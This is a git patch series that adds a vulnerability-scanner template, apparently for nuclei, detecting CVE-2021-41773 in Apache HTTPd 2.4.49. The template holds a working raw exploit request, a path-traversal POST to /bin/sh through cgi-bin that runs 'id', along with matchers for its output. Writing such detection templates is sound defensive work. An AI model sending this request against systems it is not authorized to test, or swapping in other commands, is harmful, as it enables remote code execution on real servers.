From 796dd93113f596f47836c1b41db40729de419e09 Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Wed, 6 Oct 2021 15:53:31 +0530
Subject: [PATCH 1/2] Added Apache HTTPd - 2.4.49 (CGI enabled) RCE

---
 vulnerabilities/apache/apache-httpd-rce.yaml | 41 ++++++++++++++++++++
 1 file changed, 41 insertions(+)
 create mode 100644 vulnerabilities/apache/apache-httpd-rce.yaml

diff --git a/vulnerabilities/apache/apache-httpd-rce.yaml b/vulnerabilities/apache/apache-httpd-rce.yaml
new file mode 100644
index 0000000000..b1de479889
--- /dev/null
+++ b/vulnerabilities/apache/apache-httpd-rce.yaml
@@ -0,0 +1,41 @@
+id: apache-httpd-rce
+
+info:
+  name: Apache HTTPd - 2.4.49 (CGI enabled) RCE
+  author: pdteam
+  severity: critical
+  description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
+  reference:
+    - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
+    - https://twitter.com/ptswarm/status/1445376079548624899
+    - https://github.com/blasty/CVE-2021-41773
+  tags: cve,cve2021,rce,apache
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        
+        echo Content-Type: text/plain; echo; id
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        condition: and
+        part: body
+        words:
+          - 'uid='
+          - 'gid='
+          - 'groups='
+
+    extractors:
+      - type: regex
+        regex:
+          - "(u|g)id=.*"
\ No newline at end of file

From 856b96a084c0c30c7d39d80353f62c48fbedd289 Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Wed, 6 Oct 2021 15:56:00 +0530
Subject: [PATCH 2/2] lint update

---
 vulnerabilities/apache/apache-httpd-rce.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/vulnerabilities/apache/apache-httpd-rce.yaml b/vulnerabilities/apache/apache-httpd-rce.yaml
index b1de479889..e5f0bcbea2 100644
--- a/vulnerabilities/apache/apache-httpd-rce.yaml
+++ b/vulnerabilities/apache/apache-httpd-rce.yaml
@@ -18,7 +18,7 @@ requests:
         POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        
+
         echo Content-Type: text/plain; echo; id
 
     matchers-condition: and
@@ -38,4 +38,4 @@ requests:
     extractors:
       - type: regex
         regex:
-          - "(u|g)id=.*"
\ No newline at end of file
+          - "(u|g)id=.*"